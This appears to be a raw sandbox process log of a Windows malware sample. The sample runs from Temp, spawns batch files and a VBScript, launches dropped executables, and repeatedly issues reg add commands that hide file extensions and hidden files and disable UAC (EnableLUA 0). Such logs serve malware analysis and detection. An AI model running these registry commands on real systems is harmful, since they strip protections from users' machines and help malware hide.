C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\YIwwUYsw.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\WwUAoQQs.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\jQQEAEgc.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\dsAAEIEM.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Users\Admin\MwYwMYgU\GykUgwEM.exe
"C:\Users\Admin\MwYwMYgU\GykUgwEM.exe"
C:\ProgramData\zUosEUso\ZEgMUogk.exe
"C:\ProgramData\zUosEUso\ZEgMUogk.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1580 -s 36
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1900 -s 36
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\PCwYgEUo.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\vioYYMsg.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwQIcYME.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\yEUcYQYc.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\mQEwgoIc.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\MQEgosYw.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\DMEkwwkQ.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\vSYgwswU.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\bggoQMsQ.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\PWMsIwkc.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\tgEwcUkY.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\sEEcAoUw.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\AsEEIkIE.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\EWIIIQQg.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\mekgwkkI.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\XmoMMowY.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\hAsQMcMA.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\ZuIQoMcI.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\pUAIoIcA.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
